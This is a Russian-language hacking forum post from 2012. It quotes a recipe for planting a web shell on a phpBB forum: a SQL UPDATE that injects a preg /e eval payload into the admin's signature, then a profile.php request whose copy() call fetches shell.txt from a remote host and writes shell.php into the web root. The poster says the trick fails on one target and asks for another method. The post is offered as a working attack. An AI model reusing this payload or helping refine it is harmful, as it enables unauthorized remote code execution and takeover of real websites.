04.05.2012, 12:58
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от $cr1pt
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,
Сообщение от None
запрещено редактировать чужой профиль
код не выполняется ((
Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
|
|
|